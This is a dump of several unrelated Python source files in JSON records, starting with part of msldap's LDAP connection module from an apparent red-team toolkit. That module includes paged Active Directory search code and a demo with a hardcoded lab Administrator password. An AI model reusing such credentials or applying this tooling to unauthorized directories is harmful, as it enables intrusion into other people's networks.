controls is not None:\n\t\t\t\tmsg['controls'] = controls\n\n\t\t\tmsg_id = await self.send_message(msg)\n\t\t\t\n\t\t\twhile True:\n\t\t\t\tresults = await self.recv_message(msg_id)\n\t\t\t\tfor message in results:\n\t\t\t\t\tmsg_type = message['protocolOp'].name\n\t\t\t\t\tmessage = message.native\n\t\t\t\t\tif msg_type == 'searchResDone':\n\t\t\t\t\t\t#print(message)\n\t\t\t\t\t\t#print('BREAKING!')\n\t\t\t\t\t\tif return_done is True:\n\t\t\t\t\t\t\tyield (message, None)\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\telif msg_type == 'searchResRef':\n\t\t\t\t\t\t#TODO: Check if we need to deal with this further\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif return_done is True:\n\t\t\t\t\t\tyield (message, None)\n\t\t\t\t\telse:\n\t\t\t\t\t\tyield (convert_result(message['protocolOp']), None)\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tbreak\n\t\t\n\t\texcept Exception as e:\n\t\t\tyield (None, e)\n\n\tasync def pagedsearch(self, base, query, attributes, search_scope = 2, size_limit = 1000, typesOnly = False, derefAliases = 0, timeLimit = None, controls = None):\n\t\t\"\"\"\n\t\tPaged search is the same as the search operation and uses it under the hood. Adds automatic control to read all results in a paged manner.\n\t\t\n\t\t:param base: base tree on which the search should be performed\n\t\t:type base: str\n\t\t:param query: filter query that defines what should be searched for\n\t\t:type query: str\n\t\t:param attributes: a list of attributes to be included in the response\n\t\t:type attributes: List[str]\n\t\t:param search_scope: Specifies the search operation's scope. Default: 2 (Subtree)\n\t\t:type search_scope: int\n\t\t:param types_only: indicates whether the entries returned should include attribute types only or both types and values. Default: False (both)\n\t\t:type types_only: bool\n\t\t:param size_limit: Size limit of result elements per query. Default: 1000\n\t\t:type size_limit: int\n\t\t:param derefAliases: Specifies the behavior on how aliases are dereferenced. Default: 0 (never)\n\t\t:type derefAliases: int\n\t\t:param timeLimit: Maximum time the search should take. If time limit reached the server SHOULD return an error\n\t\t:type timeLimit: int\n\t\t:param controls: additional controls to be passed in the query\n\t\t:type controls: dict\n\t\t:return: Async generator which yields (`dict`, None) tuple on success or (None, `Exception`) on error\n\t\t:rtype: Iterator[(:class:`dict`, :class:`Exception`)]\n\t\t\"\"\"\n\t\t\n\t\tif self.status != MSLDAPClientStatus.RUNNING:\n\t\t\tyield None, Exception('Connection not running! Probably encountered an error')\n\t\t\treturn\n\t\ttry:\n\t\t\tcookie = b''\n\t\t\twhile True:\n\t\t\t\t\n\t\t\t\tctrl_list_temp = [\n\t\t\t\t\tControl({\n\t\t\t\t\t\t'controlType' : b'1.2.840.113556.1.4.319',\n\t\t\t\t\t\t'controlValue': SearchControlValue({\n\t\t\t\t\t\t\t'size' : size_limit,\n\t\t\t\t\t\t\t'cookie': cookie\n\t\t\t\t\t\t}).dump()\n\t\t\t\t\t})\n\t\t\t\t]\n\t\t\t\tif controls is not None:\n\t\t\t\t\tctrl_list_temp.extend(controls)\n\t\t\t\t\n\t\t\t\tctrs = Controls(\n\t\t\t\t\tctrl_list_temp\n\t\t\t\t)\n\n\n\t\t\t\tasync for res, err in self.search(\n\t\t\t\t\tbase, \n\t\t\t\t\tquery, \n\t\t\t\t\tattributes, \n\t\t\t\t\tsearch_scope = search_scope, \n\t\t\t\t\tsize_limit=size_limit, \n\t\t\t\t\ttypes_only=typesOnly, \n\t\t\t\t\tderefAliases=derefAliases, \n\t\t\t\t\ttimeLimit=timeLimit, \n\t\t\t\t\tcontrols = ctrs,\n\t\t\t\t\treturn_done = True\n\t\t\t\t\t):\n\t\t\t\t\t\tif err is not None:\n\t\t\t\t\t\t\tyield (None, err)\n\t\t\t\t\t\t\treturn\n\n\t\t\t\t\t\tif 'resultCode' in res['protocolOp']:\n\t\t\t\t\t\t\tfor control in res['controls']:\n\t\t\t\t\t\t\t\tif control['controlType'] == b'1.2.840.113556.1.4.319':\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tcookie = SearchControlValue.load(control['controlValue']).native['cookie']\n\t\t\t\t\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\t\t\t\t\traise e\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\traise Exception('SearchControl missing from server response!')\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tyield (convert_result(res['protocolOp']), None)\n\n\t\t\t\tif cookie == b'':\n\t\t\t\t\tbreak\n\t\t\n\t\texcept Exception as e:\n\t\t\tyield (None, e)\n\n\n\tasync def get_serverinfo(self):\n\t\tif self.status != MSLDAPClientStatus.RUNNING:\n\t\t\treturn None, Exception('Connection not running! Probably encountered an error')\n\n\t\tattributes = [\n\t\t\tb'subschemaSubentry',\n \t\tb'dsServiceName',\n \t\tb'namingContexts',\n \t\tb'defaultNamingContext',\n \t\tb'schemaNamingContext',\n \t\tb'configurationNamingContext',\n \t\tb'rootDomainNamingContext',\n \t\tb'supportedControl',\n \t\tb'supportedLDAPVersion',\n \t\tb'supportedLDAPPolicies',\n \t\tb'supportedSASLMechanisms',\n \t\tb'dnsHostName',\n \t\tb'ldapServiceName',\n \t\tb'serverName',\n \t\tb'supportedCapabilities'\n\t\t]\n\n\t\tfilt = { 'present' : 'objectClass'.encode() }\n\t\tsearchreq = {\n\t\t\t'baseObject' : b'',\n\t\t\t'scope': 0,\n\t\t\t'derefAliases': 0, \n\t\t\t'sizeLimit': 1,\n\t\t\t'timeLimit': self.target.timeout - 1,\n\t\t\t'typesOnly': False,\n\t\t\t'filter': Filter(filt),\n\t\t\t'attributes': attributes,\n\t\t}\n\n\t\tbr = { 'searchRequest' : SearchRequest( searchreq\t)}\n\t\tmsg = { 'protocolOp' : protocolOp(br)}\n\n\t\tmsg_id = await self.send_message(msg)\n\t\tres = await self.recv_message(msg_id)\n\t\tres = res[0]\n\t\tif isinstance(res, Exception):\n\t\t\treturn None, res\n\t\t\n\t\t#print('res')\n\t\t#print(res)\n\t\treturn convert_attributes(res.native['protocolOp']['attributes']), None\n\n\nasync def amain():\n\timport traceback\n\tfrom msldap.commons.url import MSLDAPURLDecoder\n\n\tbase = 'DC=TEST,DC=CORP'\n\n\t#ip = 'WIN2019AD'\n\t#domain = 'TEST'\n\t#username = 'victim'\n\t#password = 'Passw0rd!1'\n\t##auth_method = LDAPAuthProtocol.SICILY\n\t#auth_method = LDAPAuthProtocol.SIMPLE\n\n\t#cred = MSLDAPCredential(domain, username, password , auth_method)\n\t#target = MSLDAPTarget(ip)\n\t#target.dc_ip = '10.10.10.2'\n\t#target.domain = 'TEST'\n\n\turl = 'ldaps+ntlm-password://test\\\\Administrator:QLFbT8zkiFGlJuf0B3Qq@WIN2019AD/?dc=10.10.10.2'\n\n\tdec = MSLDAPURLDecoder(url)\n\tcred = dec.get_credential()\n\ttarget = dec.get_target()\n\n\tprint(cred)\n\tprint(target)\n\n\tinput()\n\n\tclient = MSLDAPClientConnection(target, cred)\n\tawait client.connect()\n\tres, err = await client.bind()\n\tif err is not None:\n\t\traise err\n\t\n\tuser = \"CN=ldaptest_2,CN=Users,DC=test,DC=corp\"\n\t#attributes = {'objectClass': ['inetOrgPerson', 'posixGroup', 'top'], 'sn': 'user_sn', 'gidNumber': 0}\n\t#res, err = await client.add(user, attributes)\n\t#if err is not None:\n\t#\tprint(err)\n\n\t#changes = {\n\t#\t'unicodePwd': [('replace', ['\"TESTPassw0rd!1\"'])],\n\t#\t#'lockoutTime': [('replace', [0])]\n\t#}\n\n\t#res, err = await client.modify(user, changes)\n\t#if err is not None:\n\t#\tprint('ERR! %s' % err)\n\t#else:\n\t#\tprint('OK!')\n\t\n\tres, err = await client.delete(user)\n\tif err is not None:\n\t\tprint('ERR! %s' % err)\n\t\n\tawait client.disconnect()\n\n\n\nif __name__ == '__main__':\n\tfrom msldap import logger\n\tfrom msldap.commons.credential import MSLDAPCredential, LDAPAuthProtocol\n\tfrom msldap.commons.target import MSLDAPTarget\n\tfrom msldap.protocol.query import query_syntax_converter\n\n\tlogger.setLevel(2)\n\n\n\tasyncio.run(amain())\n\n\t\n\n\t\t\t\n\t\t\t\n\n\t\t","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/msldap/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":25003,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"70574826933","text":"import logging # log generation\nimport datetime\n \ndef logfilesetup(logname):\n \n # Create logger\n # breakpoint() \n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n\n # File Handler which logs even degug messages\n d = datetime.datetime.today()\n d = d.strftime('%Y%m%d')\n \n _LOG_FILEPATH_ = \"logs/\"\n _LOG_INFO_FILENAME_ = \"%s_%s.log\"%(d,(logname.replace('.py','')))\n \n fh = logging.FileHandler(_LOG_FILEPATH_ + _LOG_INFO_FILENAME_)\n fh.setLevel(logging.INFO)\n\n # Console Handler with higher log level\n ch = logging.StreamHandler()\n ch.setLevel(logging.ERROR)\n \n # Create formater and add it to handlers\n _LOG_FORMAT_ = \"[%(asctime)s] %(levelname)5s %(message)s (%(filename)s:%(funcName)s():%(lineno)s)\"\n formatter = logging.Formatter(_LOG_FORMAT_)\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n # Add handlers to logger\n logger.addHandler(fh)\n logger.addHandler(ch)\n\n # breakpoint()\n \n return logger\n\n","repo_name":"avelezd/hdf5_lab","sub_path":"experimental/mylogsetup.py","file_name":"mylogsetup.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6484030113","text":"#!/usr/bin/python3\n# coding=utf-8\n\"\"\"\n\n@Time : 18-10-16 下午12:19\n@Author : qcymkxyc\n@Email : qcymkxyc@163.com\n@File : my4.py\n@Software: PyCharm\n\n相关题2\n\n\"\"\"\n\n\ndef transform_count(m, n):\n \"\"\"求m的二进制形式改变多少位才能得到n\n\n :param m: int\n m\n :param n: int\n n\n :return: int\n 改编的位数\n \"\"\"\n # 异或求取不同位数\n diff_bin = m ^ n\n\n # 统计位数\n count = 0\n while diff_bin:\n count += 1\n diff_bin = (diff_bin - 1) & diff_bin\n\n return count\n","repo_name":"qcymkxyc/JZoffer","sub_path":"main/question15/my4.py","file_name":"my4.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33745986416","text":"# coding: utf-8\n\n\"\"\"\n Grafana HTTP API.\n\n The Grafana backend exposes an HTTP API, the same API is used by the frontend to do everything from saving dashboards, creating users and updating data sources. # noqa: E501\n\n OpenAPI spec version: 0.0.1\n Contact: hello@grafana.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom swagger_client.configuration import Configuration\n\n\nclass AlertTestResult(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'condition_evals': 'str',\n 'error': 'str',\n 'firing': 'bool',\n 'logs': 'list[AlertTestResultLog]',\n 'matches': 'list[EvalMatch]',\n 'state': 'AlertStateType',\n 'time_ms': 'str'\n }\n\n attribute_map = {\n 'condition_evals': 'conditionEvals',\n 'error': 'error',\n 'firing': 'firing',\n 'logs': 'logs',\n 'matches': 'matches',\n 'state': 'state',\n 'time_ms': 'timeMs'\n }\n\n def __init__(self, condition_evals=None, error=None, firing=None, logs=None, matches=None, state=None, time_ms=None, _configuration=None): # noqa: E501\n \"\"\"AlertTestResult - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._condition_evals = None\n self._error = None\n self._firing = None\n self._logs = None\n self._matches = None\n self._state = None\n self._time_ms = None\n self.discriminator = None\n\n if condition_evals is not None:\n self.condition_evals = condition_evals\n if error is not None:\n self.error = error\n if firing is not None:\n self.firing = firing\n if logs is not None:\n self.logs = logs\n if matches is not None:\n self.matches = matches\n if state is not None:\n self.state = state\n if time_ms is not None:\n self.time_ms = time_ms\n\n @property\n def condition_evals(self):\n \"\"\"Gets the condition_evals of this AlertTestResult. # noqa: E501\n\n\n :return: The condition_evals of this AlertTestResult. # noqa: E501\n :rtype: str\n \"\"\"\n return self._condition_evals\n\n @condition_evals.setter\n def condition_evals(self, condition_evals):\n \"\"\"Sets the condition_evals of this AlertTestResult.\n\n\n :param condition_evals: The condition_evals of this AlertTestResult. # noqa: E501\n :type: str\n \"\"\"\n\n self._condition_evals = condition_evals\n\n @property\n def error(self):\n \"\"\"Gets the error of this AlertTestResult. # noqa: E501\n\n\n :return: The error of this AlertTestResult. # noqa: E501\n :rtype: str\n \"\"\"\n return self._error\n\n @error.setter\n def error(self, error):\n \"\"\"Sets the error of this AlertTestResult.\n\n\n :param error: The error of this AlertTestResult. # noqa: E501\n :type: str\n \"\"\"\n\n self._error = error\n\n @property\n def firing(self):\n \"\"\"Gets the firing of this AlertTestResult. # noqa: E501\n\n\n :return: The firing of this AlertTestResult. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._firing\n\n @firing.setter\n def firing(self, firing):\n \"\"\"Sets the firing of this AlertTestResult.\n\n\n :param firing: The firing of this AlertTestResult. # noqa: E501\n :type: bool\n \"\"\"\n\n self._firing = firing\n\n @property\n def logs(self):\n \"\"\"Gets the logs of this AlertTestResult. # noqa: E501\n\n\n :return: The logs of this AlertTestResult. # noqa: E501\n :rtype: list[AlertTestResultLog]\n \"\"\"\n return self._logs\n\n @logs.setter\n def logs(self, logs):\n \"\"\"Sets the logs of this AlertTestResult.\n\n\n :param logs: The logs of this AlertTestResult. # noqa: E501\n :type: list[AlertTestResultLog]\n \"\"\"\n\n self._logs = logs\n\n @property\n def matches(self):\n \"\"\"Gets the matches of this AlertTestResult. # noqa: E501\n\n\n :return: The matches of this AlertTestResult. # noqa: E501\n :rtype: list[EvalMatch]\n \"\"\"\n return self._matches\n\n @matches.setter\n def matches(self, matches):\n \"\"\"Sets the matches of this AlertTestResult.\n\n\n :param matches: The matches of this AlertTestResult. # noqa: E501\n :type: list[EvalMatch]\n \"\"\"\n\n self._matches = matches\n\n @property\n def state(self):\n \"\"\"Gets the state of this AlertTestResult. # noqa: E501\n\n\n :return: The state of this AlertTestResult. # noqa: E501\n :rtype: AlertStateType\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this AlertTestResult.\n\n\n :param state: The state of this AlertTestResult. # noqa: E501\n :type: AlertStateType\n \"\"\"\n\n self._state = state\n\n @property\n def time_ms(self):\n \"\"\"Gets the time_ms of this AlertTestResult. # noqa: E501\n\n\n :return: The time_ms of this AlertTestResult. # noqa: E501\n :rtype: str\n \"\"\"\n return self._time_ms\n\n @time_ms.setter\n def time_ms(self, time_ms):\n \"\"\"Sets the time_ms of this AlertTestResult.\n\n\n :param time_ms: The time_ms of this AlertTestResult. # noqa: E501\n :type: str\n \"\"\"\n\n self._time_ms = time_ms\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(AlertTestResult, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, AlertTestResult):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, AlertTestResult):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"midokura/grafana-sync","sub_path":"swagger_client/models/alert_test_result.py","file_name":"alert_test_result.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1627068837","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\nfrom matplotlib.gridspec import GridSpec\nfrom scipy.stats import gaussian_kde\nfrom tqdm import tqdm\nimport warnings\nfrom sklearn import linear_model\nfrom matplotlib.colors import LinearSegmentedColormap\n\n# Ignore warnings\nwarnings.filterwarnings(\"error\")\n\n# Load the data\ndata = []\nwith open('metrics.csv', 'r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n [data.append([np.array([int(col) for col in row]), len(row)]) for row in csv_reader if len(row) != 0]\n\naccuracy = []\n# median of none zero values\nmedianNoneZero = []\n# max none zero value\nmaxNoneZero = []\nfor arr, _len in tqdm(data, desc='Calculating'):\n a = (arr == 0).sum()\n # skips if all values are zero\n if arr.sum() == 0 or a == 0:\n continue\n accuracy.append(a/_len)\n medianNoneZero.append(np.median(arr[arr != 0]))\n maxNoneZero.append(np.max(arr[arr != 0]))\n\nransac = linear_model.RANSACRegressor(min_samples=200, max_trials=1000)\naccuracy = np.array(accuracy).reshape(-1, 1)\nmedianNoneZero = np.array(medianNoneZero).reshape(-1, 1)\nmaxNoneZero = np.array(maxNoneZero).reshape(-1, 1)\n\n# \"Viridis-like\" colormap with white background\nwhite_viridis = LinearSegmentedColormap.from_list('white_viridis', [\n (0, '#ffffff'),\n (1e-20, '#440053'),\n (0.2, '#404388'),\n (0.4, '#2a788e'),\n (0.6, '#21a784'),\n (0.8, '#78d151'),\n (1, '#fde624'),\n], N=256)\n\n# Plot the data\n# fig = plt.figure(figsize=(10, 5))\n\nfig = plt.figure(figsize=(10, 5), constrained_layout=True)\ngs = GridSpec(3, 3, figure=fig)\n\n# Histogram plotting\nprint('Plotting histograms')\nplt.subplot(gs[0, :])\nbinwidth = 500\nbins = list(range(0, int(np.max(maxNoneZero)) + binwidth, binwidth))\nplt.hist(maxNoneZero,\n bins=bins,\n alpha=0.5,\n label='Max',\n density = True\n )\nplt.plot(bins, gaussian_kde(maxNoneZero.reshape(-1))(bins), label='Max KDE')\nbins = range(0, int(np.max(medianNoneZero)) + binwidth, binwidth)\nplt.hist(medianNoneZero,\n bins=bins,\n alpha=0.5,\n label='Median',\n density = True\n )\nplt.grid()\nplt.title('None zero values')\nplt.yscale('log')\nplt.legend(loc='upper right')\n# plt.show()\n# exit()\n# Scatter plots\nprint(\"Plotting scatter plots 1\")\nax = plt.subplot(2, 2, 3)\n# Fit linear regression via the least squares with numpy.polyfit\n# It returns a slope (b) and intercept (a)\n# deg=1 means linear fit (i.e. polynomial of degree 1)\nb, a = np.polyfit(accuracy.reshape(-1), medianNoneZero.reshape(-1), deg=1)\nransac.fit(accuracy, medianNoneZero)\n# Create sequence of 100 numbers from 0 to 100\nxseq = np.linspace(0, 1, num=1000)\nline_y_ransac = ransac.predict(xseq.reshape(-1, 1))\n# Plot regression line\nplt.plot(xseq, a + b * xseq,\n color=\"b\",\n lw=1\n ,label='Least squares')\nplt.plot(xseq, line_y_ransac,\n color=\"r\",\n lw=1\n ,label='RANSAC'\n )\n\nxy = np.vstack([accuracy.reshape(-1), medianNoneZero.reshape(-1)])\nz = gaussian_kde(xy)(xy)\n\nplt.scatter(accuracy, medianNoneZero, s=1, c=z)\nymin = 0.9\nax.set_ylim(ymin=ymin)\nplt.title('Accuracy vs Median of none zero values')\nplt.yscale('log')\nplt.legend(loc='lower left')\n\nprint(\"Plotting scatter plots 2\")\nax = plt.subplot(2, 2, 4)\n# Fit linear regression via the least squares with numpy.polyfit\n# It returns a slope (b) and intercept (a)\n# deg=1 means linear fit (i.e. polynomial of degree 1)\nb, a = np.polyfit(accuracy.reshape(-1), maxNoneZero.reshape(-1), deg=1)\nransac.fit(accuracy, maxNoneZero)\n# Create sequence of 100 numbers from 0 to 100\nxseq = np.linspace(0, 1, num=1000)\nline_y_ransac = ransac.predict(xseq.reshape(-1, 1))\n# Plot regression line\nplt.plot(xseq, a + b * xseq,\n color=\"b\",\n lw=1\n ,label='Least squares'\n )\nplt.plot(xseq, line_y_ransac,\n color=\"r\",\n lw=1\n ,label='RANSAC'\n )\nxy = np.vstack([accuracy.reshape(-1), maxNoneZero.reshape(-1)])\nz = gaussian_kde(xy)(xy)\n\nplt.scatter(accuracy, maxNoneZero, s=1, c=z, cmap=white_viridis)\nplt.title('Accuracy vs Max of none zero values')\nplt.yscale('log')\nplt.legend(loc='lower left')\nax.set_ylim(ymin=ymin)\nplt.show()\n","repo_name":"biddls/Text-gen-Using-BERT","sub_path":"vis/advvis.py","file_name":"advvis.py","file_ext":"py","file_size_in_byte":4222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"283005120","text":"import socket\n\nHEADER = 64\nPORT = 1313\n# SERVER = \"192.168.56.1\"\n# get the ip adress of the server machine dynamically\nSERVER = socket.gethostbyname(socket.gethostname())\nADDR = (SERVER, PORT)\nFORMAT = 'utf-8'\nDISCONNECT_MSG = \"!DISCONNECT\"\n","repo_name":"dhia-ammar/PSR","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"784087467","text":"import os\nfrom typing import Any, Iterable, Optional\n\nfrom lsst.daf.butler import Butler\n\nfrom lsst.cm.tools.core.butler_utils import build_data_queries, fake_data_queries\nfrom lsst.cm.tools.core.db_interface import DbInterface\nfrom lsst.cm.tools.core.handler import Handler\nfrom lsst.cm.tools.core.utils import LevelEnum, StatusEnum\nfrom lsst.cm.tools.db.campaign import Campaign\nfrom lsst.cm.tools.db.entry_handler import GenericEntryHandler\nfrom lsst.cm.tools.db.group import Group\nfrom lsst.cm.tools.db.step import Step\n\n\nclass StepHandler(GenericEntryHandler):\n \"\"\"Campaign level callback handler\n\n Provides interface functions.\n\n Derived classes will have to:\n\n 1. provide the parameters for the Group callback handler with the\n `group_iterator` function.\n \"\"\"\n\n config_block = \"step\"\n\n fullname_template = os.path.join(\"{production_name}\", \"{campaign_name}\", \"{step_name}\")\n\n group_handler_class: Optional[str]\n\n level = LevelEnum.step\n\n def insert(self, dbi: DbInterface, parent: Campaign, **kwargs: Any) -> Step:\n step_name = self.get_kwarg_value(\"step_name\", **kwargs)\n # coll_source = self.get_kwarg_value(\"coll_source\", **kwargs)\n coll_source = kwargs.get(\"coll_source\", parent.coll_in)\n insert_fields = dict(\n name=step_name,\n fullname=self.get_fullname(**kwargs),\n p_id=parent.p_.id,\n c_id=parent.id,\n config_id=parent.config_id,\n frag_id=self._fragment_id,\n data_query=kwargs.get(\"data_query\"),\n coll_in=coll_source,\n coll_source=coll_source,\n bps_yaml_template=self.get_config_var(\"bps_yaml_template\", parent.bps_yaml_template, **kwargs),\n bps_script_template=self.get_config_var(\n \"bps_script_template\", parent.bps_script_template, **kwargs\n ),\n lsst_version=self.get_config_var(\"lsst_version\", parent.lsst_version, **kwargs),\n lsst_custom_setup=self.get_config_var(\"lsst_custom_setup\", parent.lsst_custom_setup, **kwargs),\n pipeline_yaml=self.get_config_var(\"pipeline_yaml\", None, **kwargs),\n status=StatusEnum.waiting,\n )\n extra_fields = dict(\n prod_base_url=parent.prod_base_url,\n root_coll=parent.root_coll,\n production_name=parent.p_.name,\n campaign_name=parent.name,\n step_name=step_name,\n )\n coll_names = self.coll_names(insert_fields, **extra_fields)\n insert_fields.update(**coll_names)\n return Step.insert_values(dbi, **insert_fields)\n\n def make_children(self, dbi: DbInterface, entry: Any) -> StatusEnum:\n self.make_groups(dbi, entry)\n return StatusEnum.populating\n\n def make_groups(self, dbi: DbInterface, entry: Step) -> dict[str, Group]:\n \"\"\"Called to set up the groups needed to process this step\n\n Parameters\n ----------\n dbi : DbInterface\n Interface to the database we updated\n\n entry : Step\n The entry we are preparing\n\n Returns\n -------\n groups : dict[str, Group]\n The newly made Groups\n \"\"\"\n out_dict = {}\n group_config_block = self.get_config_var(\"group_config\", \"group\")\n group_handler = entry.get_sub_handler(group_config_block)\n insert_fields = dict(\n production_name=entry.p_.name,\n campaign_name=entry.c_.name,\n step_name=entry.name,\n coll_source=entry.coll_in,\n )\n for group_kwargs in self.group_iterator(dbi, entry, **insert_fields):\n insert_fields.update(**group_kwargs)\n out_dict[group_kwargs[\"group_name\"]] = group_handler.insert(dbi, entry, **insert_fields)\n return out_dict\n\n def group_iterator(self, dbi: DbInterface, entry: Step, **kwargs: Any) -> Iterable:\n \"\"\"Iterator of over the parameters of the Groups for this step\n\n Parameters\n ----------\n dbi : DbInterface\n Interface to the database we updated\n\n entry : Step\n The entry we are preparing\n\n Keywords\n --------\n These can\n\n Returns\n -------\n group_configs : Iterable[dict[str, Any]]\n Iterator over the configs\n \"\"\"\n out_dict = dict(\n production_name=entry.p_.name,\n campaign_name=entry.c_.name,\n step_name=entry.name,\n )\n data_query_base = self.config.get(\"data_query_base\", \"\")\n split_args = self.config.get(\"split_args\", {})\n split_vals = self.config.get(\"split_vals\", {})\n if split_args:\n butler = Butler(\n entry.butler_repo,\n collections=[entry.coll_source],\n )\n if Handler.script_method.value > 0:\n data_queries = build_data_queries(butler, **split_args)\n else:\n data_queries = fake_data_queries(\n field=split_args.get(\"field\"), min_queries=split_args.get(\"min_queries\")\n )\n elif split_vals:\n split_field = split_vals[\"field\"]\n split_list = split_vals[\"values\"]\n data_queries = [f\"{split_field} in ({split_value_})\" for split_value_ in split_list]\n else:\n data_queries = [None]\n for i, dq_ in enumerate(data_queries):\n data_query = data_query_base\n if dq_ is not None:\n data_query += f\" AND {dq_}\"\n out_dict.update(\n group_name=f\"group{i}\",\n data_query=data_query,\n )\n yield out_dict\n","repo_name":"lsst-dm/cm_tools","sub_path":"src/lsst/cm/tools/db/step_handler.py","file_name":"step_handler.py","file_ext":"py","file_size_in_byte":5675,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26613553483","text":"from collections import deque\n\nn = int(input())\nstart = []\nG = [[0] * 2020 for _ in range(2020)]\nmer = 1005\nfor i in range(n):\n x, y = map(int, input().split())\n x += mer\n y += mer\n G[x][y] = 1\n start.append([x, y])\n\n\nvisited = [[False] * 2020 for _ in range(2020)]\ndx = [-1, -1, 0, 0, 1, 1]\ndy = [-1, 0, -1, 1, 0, 1]\nque = deque()\nans = 0\nfor x, y in start:\n if not visited[x][y]:\n visited[x][y] = True\n que.append([x, y])\n ans += 1\n\n while 0 < len(que):\n nox, noy = que.popleft()\n for i in range(6):\n nx = nox + dx[i]\n ny = noy + dy[i]\n if G[nx][ny] == 1 and not visited[nx][ny]:\n visited[nx][ny] = True\n que.append([nx, ny])\n\nprint(ans)\n","repo_name":"mei28/Competitive-programing","sub_path":"ABC-269/D_BFS.py","file_name":"D_BFS.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1354243818","text":"#!/usr/bin/python\n\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\n\n# instruction: change i from 0 to 2 to select plotting different function\ni = 2\n\ndef wireframe(ax, f, m):\n xs = range(m)\n ys = range(m)\n xs, ys = np.meshgrid(xs, ys)\n zs = f(xs, ys)\n ax.plot_wireframe(xs, ys, zs)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\nfs = [lambda x, y: x + y, lambda x, y: pow(2, x) + y, lambda x, y: x*x + y*y]\n\nwireframe(ax, fs[i], 50)\n\nax.set_xlabel('X')\nax.set_ylabel('Y')\nax.set_zlabel('Z')\n#ax.legend()\n\nplt.show()\n","repo_name":"liuxinyu95/AlgoXY","sub_path":"search/binary-search/src/saddleback_frame.py","file_name":"saddleback_frame.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":5880,"dataset":"github-code","pt":"37"} +{"seq_id":"73492140908","text":"import numpy as np\nimport scipy.ndimage\nimport scipy.misc\nfrom PIL import ImageFilter\n\nfrom GimelStudio import api\n\n# FIXME: hack!\nfrom GimelStudio.utils.image import ArrayFromImage, ArrayToImage\n\n\nclass ToNormalMapNode(api.NodeBase):\n def __init__(self, _id):\n api.NodeBase.__init__(self, _id)\n\n def SmoothGaussian(self, im, sigma):\n \"\"\" Blurs the normals. \"\"\"\n if sigma == 0:\n return im\n\n im_smooth = im.astype(float)\n kernel_x = np.arange(-3 * sigma, 3 * sigma + 1).astype(float)\n kernel_x = np.exp((-(kernel_x**2)) / (2 * (sigma**2)))\n\n im_smooth = scipy.ndimage.convolve(im_smooth, kernel_x[np.newaxis])\n\n im_smooth = scipy.ndimage.convolve(im_smooth, kernel_x[np.newaxis].T)\n\n return im_smooth\n\n def Gradient(self, im_smooth):\n \"\"\" Calculates the gradient for the normal map. \"\"\"\n gradient_x = im_smooth.astype(float)\n gradient_y = im_smooth.astype(float)\n\n kernel 